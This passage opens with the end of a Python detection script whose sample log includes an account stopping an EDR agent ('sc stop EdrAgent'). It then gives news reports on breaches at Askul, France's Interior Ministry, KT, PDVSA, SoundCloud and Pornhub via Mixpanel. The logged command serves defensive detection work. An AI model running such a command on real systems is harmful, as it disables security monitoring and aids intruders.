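ts=2025-10-18T23:06:01 event=process host=FS01 user=partner-admin cmd="sc stop EdrAgent"
ts=2025-10-18T23:06:02 event=service host=FS01 service=EdrAgent state=stopped actor=partner-admin
ts=2025-10-18T23:30:00 event=logon user=ops-user src=10.0.7.3 host=FS01 result=success mfa=n/a
"""

if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f)
```

On the sample, `partner-admin` trips all three rules while `ops-user`, who authenticated with MFA and touched only two hosts 49 minutes apart, trips none. The rules are deliberately independent: any one of them is noisy on its own, but the same account appearing in all three within an hour is the pattern the root-cause analysis describes, and an EDR service stop on a server is worth paging on regardless of what else is seen.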

Security Reforms and Governance Changes 

In response to the data breach at Askul, the company initiated sweeping security reforms aligned with the U.S. National Institute of Standards and Technology (NIST) Cybersecurity Framework. Enhancements include mandatory MFA for all remote access, strengthened log analysis, expanded 24/7 security monitoring, and improved asset integrity checks.

Askul has also committed to rebuilding its security governance framework by the end of the fiscal year in May 2026, focusing on enterprise risk management, clearer accountability, and stronger oversight.

The company noted that it has not contacted the attackers, negotiated, or paid any ransom, citing its responsibility to avoid encouraging criminal activity. It continues to cooperate with law enforcement, regulatory authorities, and information-sharing organizations such as JPCERT/CC.

France Arrests 22-Year-Old Suspect in Ministry of the Interior Cyberattack

18 December 2025 at 01:37

French Interior Ministry cyberattack

French authorities have arrested a 22-year-old man in connection with a French Interior Ministry cyberattack, marking an important development in an investigation into the breach of the ministry’s internal email systems. The arrest was carried out on December 17, 2025, following an inquiry led by the cybercrime unit of the Paris prosecutor’s office. According to a notice issued by France’s Ministry of the Interior, the suspect was taken into custody on charges including unauthorized access to a state-run automated personal data processing system. The offense carries a maximum sentence of up to 10 years in prison. "A person was arrested on December 17, 2025, as part of an investigation opened by the cybercrime unit of the Paris prosecutor's office, on charges including unauthorized access to a state-run automated personal data processing system, following the cyberattack against the Ministry of the Interior," the press release, translated into English, said. The ministry confirmed that the individual, born in 2003, is already known to the justice system and was convicted earlier in 2025 for similar cyber-related offenses. Authorities have not disclosed the suspect’s identity. "The suspect, born in 2003, is already known to the justice system, having been convicted of similar offenses in 2025," the release added.

Investigation Into Cyberattack on France’s Ministry of the Interior 

The French Interior Ministry cyberattack was first publicly acknowledged last week, after officials revealed that the ministry’s internal email servers had been compromised. The cyberattack was detected overnight between Thursday, December 11, and Friday, December 12, and resulted in unauthorized access to a number of document files. French Interior Minister Laurent Nuñez described the incident as more serious than initially believed. Speaking to Franceinfo radio, he said, "It's serious. A few days ago, I said that we didn't know whether there had been any compromises or not. Now we know that there have been compromises, but we don't know the extent of them." Authorities later confirmed that the compromised files included criminal records, raising concerns about the sensitivity of the exposed information. However, Nuñez urged caution when assessing the scale of the breach. "I can tell you that there have not been millions of pieces of data extracted as of this morning (...), but I remain very cautious about the level of compromise," he added.

Legal Action Against the French Interior Ministry Cyberattack

In a statement issued by Public Prosecutor Laure Beccuau, officials said the suspect in the French Interior Ministry cyberattack was arrested as part of an investigation into unauthorized access to an automated data processing system, allegedly carried out as part of an organized group. Prosecutors reiterated that this offense is punishable by up to 10 years’ imprisonment. The investigation is being conducted by OFAC, France’s Office for Combating Cybercrime. Authorities noted that a further statement will be released once the police custody period ends, which can last up to 48 hours. French prosecutors also confirmed that while the suspect has prior convictions for similar crimes in 2025, they are not disclosing further details about those cases.

Government Response and Security Measures

Following the French Interior Ministry cyberattack, the Ministry of the Interior implemented standard security protocols and strengthened access controls across its systems. Speaking on RTL Radio, Minister Nuñez confirmed the attack and the immediate response: "There was indeed a cyberattack. An attacker was able to access a number of files. So we implemented the usual protection procedures." He further stated that investigations into the French Interior Ministry cyberattack are ongoing at both judicial and administrative levels, and that France’s data protection authority, the National Commission for Information Technology and Civil Liberties (CNIL), has been notified. On RTL Matin, Nuñez emphasized that the origin of the French Interior Ministry cyberattack remains unclear: "It could be foreign interference, it could be people wanting to challenge the authorities and demonstrate their ability to access systems, and it could also be cybercrime. Right now, we don't know what it is."

Claims of Responsibility Surface Online

Following public disclosure of the French Interior Ministry cyberattack incident, a post appeared on an underground forum claiming responsibility for the breach. The post stated, "We hereby announce that, in revenge for our arrested friends, we have successfully compromised 'MININT' — the French Ministry of the Interior." The message appeared to reference the 2025 arrests of five BreachForums moderators and administrators, known online as “ShinyHunters,” “Hollow,” “Noct,” “Depressed,” and “IntelBroker.” However, authorities have not confirmed any direct link between the arrested suspect and these claims. As the investigation into the French Interior Ministry cyberattack continues, French officials have stressed that all possibilities remain under consideration and that further updates will follow once the custody period concludes.

State-Level Cyber Espionage Suspected in KT Telecom Breach

17 December 2025 at 03:02

KT Cyberattack

A recent report by British technology research firm Rethink Technology Research has raised serious concerns over a cyberattack on KT, South Korea’s leading telecom operator, suggesting the incident may involve state-level cyber espionage rather than a simple fraud case. The report, titled “KT Cyberattack: More Serious Than You Think,” was published on December 10 and analyzes the implications of the breach in detail.

According to Rethink Technology Research, the KT cyberattack appears to have targeted femtocells, small cellular base stations used in homes and offices, not for micro-payment fraud, but potentially to collect large-scale data at a national level. The report states, “The cyberattack on South Korean telecom company KT is not a simple fraud case but closer to a state-level cyber espionage activity spanning several years when examining the details.”

The report further notes that KT’s internal logs only date back to August 2024, making it difficult to confirm what occurred at vulnerable points before that period. Analysts suggest that this lack of historical data complicates the investigation and points to possible systemic failures in femtocell management, server oversight, and encryption protocols. “It seems inevitable that KT's leadership will face accountability for management negligence,” the report adds.

Security Experts Weigh In

Security experts in South Korea have weighed in on the report’s findings. Dmitry Kurbatov, Chief Technology Officer at global communication security company SecurityGen, posted on LinkedIn that “the unauthorized micro-payment incident at KT is likely a deeper issue involving a network of thousands of femtocells.” Similarly, Kim Yong-dae, a professor in the Department of Electrical and Electronic Engineering at KAIST, described the incident as essentially a wiretapping operation rather than conventional financial fraud.

While Rethink Technology Research frames the attack as unprecedented in scope and sophistication, KT officials have pushed back against the report’s conclusions. A company spokesperson stated, “If you look at other reports by the author of this report, there is a tendency to be favorable and biased toward certain companies. It is difficult to regard this as an objective interpretation.”

The KT Cyberattack Investigation Timeline

The cyberattack on KT was first detected in early September, when irregular micro-payments were identified across the network. A joint government-private investigation has been ongoing for over three months, with authorities yet to release the final findings. Analysts attribute the delay to stretched investigative resources due to a series of large-scale cyber incidents in South Korea, including the Coupang data leak. Some have also speculated that the prolonged timeline may indicate an intentional delay on KT’s part.

For comparison, the SK Telecom hacking case was resolved within two and a half months, followed by compensation announcements for affected users. In the case of KT, an investigation team official noted during a briefing following the presidential business report on December 12, “While investigating KT, additional issues have emerged, and server forensics are taking a considerable amount of time.”

Industry observers warn that the cyberattack on KT should serve as a cautionary tale for telecom operators not only in South Korea but globally.

PDVSA Cyberattack Disrupts Administrative Systems, Oil Cargo Deliveries Suspended

17 December 2025 at 02:09

PDVSA cyberattack

Venezuela’s state-run oil company, Petróleos de Venezuela (PDVSA), has confirmed that a cyberattack on PDVSA’s administrative systems caused widespread disruptions, even as the company publicly claimed that oil operations were unaffected. The Venezuela oil cyberattack, or PDVSA cyberattack, comes at a time of escalating political and military tensions between Caracas and Washington, following recent U.S. actions against Venezuelan oil shipments. PDVSA announced the incident in a statement on Monday, blaming the attack on the United States and describing it as part of a broader strategy to seize control of Venezuela’s oil resources. However, cybersecurity experts and company sources cited by Reuters have found no evidence linking the PDVSA cyberattack to the U.S. government.

PDVSA Blames US for Cyberattack on Venezuela’s Oil Company

In its statement, PDVSA accused the United States of coordinating the PDVSA cyberattack as part of what it called an aggressive campaign against Venezuela’s energy sovereignty. “This attempt at aggression adds to the public strategy of the U.S. government to take over Venezuelan oil by force and piracy,” PDVSA said. The company claimed the cyberattack was carried out by foreign interests working with domestic actors to undermine Venezuela’s right to develop its energy sector independently. Venezuela’s oil ministry echoed these accusations, stating that the attack aligned with U.S. efforts to control the country’s oil through “force and piracy.” Despite these claims, PDVSA provided no technical details about the attack or evidence supporting the allegations.

Ransomware Attack Suspected as PDVSA Systems Go Down

While PDVSA said it had recovered from the cyberattack, multiple sources told Reuters that the PDVSA ransomware attack was far more damaging than officials admitted. According to four sources, the company’s administrative systems remained down, forcing a halt to oil cargo deliveries. “There’s no delivery of cargoes, all systems are down,” one PDVSA source told Reuters, adding that workers internally described the incident as a ransomware attack. Sources said PDVSA detected the attack days earlier. In attempting to resolve the issue, antivirus software reportedly disrupted the company’s entire administrative network. As a result, workers were forced to keep handwritten records after systems failed to restart. Although oil production, refining, and domestic fuel distribution were reportedly unaffected by the PDVSA cyberattack, export logistics were severely disrupted. A shipper involved in Venezuelan oil deals confirmed that all loading instructions for export markets remained suspended.

Oil Exports Impacted as PDVSA Limits System Access

As the Venezuela cyberattack on PDVSA continued, the company reportedly ordered administrative and operational staff to disconnect from internal systems. Access for indirect workers was also restricted, according to sources. PDVSA’s website remained offline as of Tuesday afternoon, adding to concerns about the scale of the disruption. Despite official claims of recovery, sources said the effects of the cyber incident were ongoing.

PDVSA Cyberattack Follows US Seizure of Venezuelan Oil Tanker

The PDVSA cyberattack occurred just one week after U.S. military forces seized a PDVSA tanker carrying nearly 1.85 million barrels of Venezuelan heavy crude in the Caribbean. The seizure drew strong condemnation from Cuba, which described it as an act of piracy and a violation of international law. Cuban officials said the tanker was believed to be transporting oil destined for Cuba, a country that relies heavily on Venezuelan oil supplies. Following the seizure, Reuters reported that Venezuelan oil exports fell sharply, with some tankers turning back due to fears of further U.S. action. U.S. officials have indicated that more tanker seizures could follow in the coming weeks.

Geopolitical Pressure Intensifies Around Venezuela’s Oil Industry

The PDVSA cyberattack has unfolded amid a broader U.S. military buildup in the Caribbean, U.S. strikes on alleged drug trafficking boats, and renewed sanctions targeting Venezuelan shipping and individuals linked to President Nicolás Maduro. The Venezuelan government maintains that the United States is seeking regime change to gain access to the country’s vast oil reserves. PDVSA, which plays a key role in Venezuela’s financial ties with China, Russia, Iran, and Cuba, remains central to that struggle. As tensions rise, the PDVSA cyberattack highlights how digital attacks, sanctions, and military pressure are increasingly converging around Venezuela’s oil sector, with significant implications for global energy markets and regional stability.

SoundCloud Confirms Cyberattack, Limited User Data Exposed

16 December 2025 at 02:51

SoundCloud cyberattack

SoundCloud has confirmed a cyberattack on its platform after days of user complaints about service disruptions and connectivity problems. In what is being reported as a SoundCloud cyberattack, threat actors gained unauthorized access to one of its systems and exfiltrated a limited set of user data. “SoundCloud recently detected unauthorized activity in an ancillary service dashboard,” the company said. “Upon making this discovery, we immediately activated our incident response protocols and promptly contained the activity.”

Reports of trouble began circulating over several days, with users reporting that they were unable to connect to SoundCloud or experiencing access issues when using VPNs. After the disruptions persisted, the company issued a public statement on its website acknowledging the SoundCloud cyberattack incident.

DoS Follows Initial SoundCloud Cyberattack

According to the music hosting service provider, the SoundCloud cyberattack was followed by a wave of denial-of-service attacks that further disrupted access to the platform. The company said it experienced multiple DoS incidents after the breach was contained, two of which were severe enough to take the website offline and prevent users from accessing the service altogether.

SoundCloud stated that it was ultimately able to repel the attacks, but the interruptions were enough to draw widespread attention from users and the broader technology community. These events highlighted the cascading impact of a cyberattack on SoundCloud, where an initial security compromise was compounded by availability-focused attacks designed to overwhelm the platform.

Scope of Exposed Data and User Impact 

While the SoundCloud cyberattack raised immediate concerns about user privacy, the company stresses that the exposed data was limited. SoundCloud said its investigation found no evidence that sensitive information had been accessed.

“We understand that a purported threat actor group accessed certain limited data that we hold,” the company said. “We have completed an investigation into the data that was impacted, and no sensitive data (such as financial or password data) has been accessed.”

Instead, the data involved consisted of email addresses and information already visible on public SoundCloud profiles. According to the company, approximately 20 percent of SoundCloud users were affected by the breach.

Although SoundCloud described the data as non-sensitive, the scale of the exposure is notable. Email addresses can still be leveraged in phishing campaigns or social engineering attacks, even when other personal details remain secure.

SoundCloud added that it is confident the attackers’ access has been fully shut down. “We are confident that any access to SoundCloud data has been curtailed,” the company said.

Security Response and Ongoing Connectivity Issues 

The company did not attribute the SoundCloud cyberattack to a specific hacking group but confirmed that it is working with third-party cybersecurity experts and has fully engaged its incident response protocols. As part of its remediation efforts, the company said it has enhanced monitoring and threat detection, reviewed and reinforced identity and access controls, and conducted a comprehensive audit of related systems.

Some of these security upgrades had unintended consequences. SoundCloud acknowledged that changes made to strengthen its defenses contributed to the VPN connectivity issues reported by users in recent days.

“We are actively working to resolve these VPN related access issues,” the company said.

PornHub Confirms Premium User Data Exposure Linked to Mixpanel Breach

16 December 2025 at 01:48

PornHub Data Breach

PornHub is facing renewed scrutiny after confirming that some Premium users’ activity data was exposed following a security incident at a third-party analytics provider. The PornHub data breach disclosure comes as the platform faces increasing regulatory scrutiny in the United States and reported extortion attempts linked to the stolen data. The issue stems from a data breach linked not to PornHub’s own systems, but to Mixpanel, an analytics vendor the platform previously used. On December 12, 2025, PornHub published a security notice confirming that a cyberattack on Mixpanel led to the exposure of historical analytics data, affecting a limited number of Premium users. According to PornHub, the compromised data included search and viewing history tied to Premium accounts, which has since been used in extortion attempts attributed to the ShinyHunters extortion group. “A recent cybersecurity incident involving Mixpanel, a third-party data analytics provider, has impacted some Pornhub Premium users,” the company stated in its notice dated December 12, 2025.

PornHub stresses that the incident did not involve a compromise of its own systems and that sensitive account information remained protected.

“Specifically, this situation affects only select Premium users. It is important to note that this was not a breach of Pornhub Premium’s systems. Passwords, payment details, and financial information remain secure and were not exposed.”

According to PornHub, the affected records are not recent. The company said it stopped working with Mixpanel in 2021, indicating that any stolen data would be at least four years old. Even so, the exposure of viewing and search behavior has raised privacy concerns, particularly given the stigma and personal risk that can accompany such information if misused.

Mixpanel Smishing Attack Triggered Supply-Chain Exposure 

The root of the incident was a PornHub cyberattack by proxy, a supply-chain compromise. Mixpanel disclosed on November 27, 2025, that it had suffered a breach earlier in the month. The company detected the intrusion on November 8, 2025, after a smishing (SMS phishing) campaign allowed threat actors to gain unauthorized access to its systems. Mixpanel CEO Jen Taylor addressed the incident in a public blog post, stressing transparency and remediation.

“On November 8th, 2025, Mixpanel detected a smishing campaign and promptly executed our incident response processes,” Taylor wrote. “We took comprehensive steps to contain and eradicate unauthorized access and secure impacted user accounts. We engaged external cybersecurity partners to remediate and respond to the incident.”

Mixpanel said the breach affected only a “limited number” of customers and that impacted clients were contacted directly. The company outlined an extensive response that included revoking active sessions, rotating compromised credentials, blocking malicious IP addresses, performing global password resets for employees, and engaging third-party forensic experts. Law enforcement and external cybersecurity advisors were also brought in as part of the response.

OpenAI and PornHub Among Impacted Customers 

PornHub was not alone among Mixpanel’s customers caught up in the incident. OpenAI disclosed on November 26, 2025, one day before Mixpanel’s public announcement, that it, too, had been affected. OpenAI clarified that the incident occurred entirely within Mixpanel’s environment and involved limited analytics data related to some API users.

“This was not a breach of OpenAI’s systems,” the company said, adding that no chats, API requests, credentials, payment details, or government IDs were exposed. OpenAI noted that it uses Mixpanel to manage web analytics on its API front end.

PornHub offered a similar assurance in its own disclosure, stating that it had launched an internal investigation with the support of cybersecurity experts and had engaged with relevant authorities. “We are working diligently to determine the nature and scope of the reported incident,” the company said, while urging users to remain vigilant for suspicious emails or unusual activity.

Despite those assurances, the cyberattack on PornHub, albeit indirect, has drawn attention due to the sensitive nature of the exposed data and the reported extortion attempts now linked to it.

PornHub Data Breach Comes Amid Expanding U.S. Age-Verification Laws 

The PornHub data breach arrives at a time when the platform is already under pressure from sweeping age-verification laws across the United States. PornHub is currently blocked in 22 states, including Alabama, Arizona, Arkansas, Florida, Georgia, Idaho, Indiana, Kansas, Kentucky, Mississippi, Montana, Nebraska, North Carolina, North Dakota, Oklahoma, South Carolina, South Dakota, Tennessee, Texas, Utah, Virginia, and Wyoming. These restrictions stem from state laws requiring users to submit government-issued identification or other forms of age authentication to access explicit content.

Louisiana was the first state to enact such a law, and others followed after the U.S. Supreme Court ruled in June that Texas’s age-verification statute was constitutional. Although PornHub is not blocked in Louisiana, the requirement for ID verification has had a significant impact. Aylo, PornHub’s parent company, said that the traffic in the state dropped by approximately 80 percent after the law took effect.

Aylo has repeatedly criticized the implementation of these laws. “These people did not stop looking for porn. They just migrated to darker corners of the internet that don’t ask users to verify age, that don’t follow the law, that don’t take user safety seriously,” the company said in a statement.

Aylo added that while it supports age verification in principle, the current approach creates new risks. Requiring large numbers of adult websites to collect highly sensitive personal information, the company argued, puts users in danger if those systems are compromised.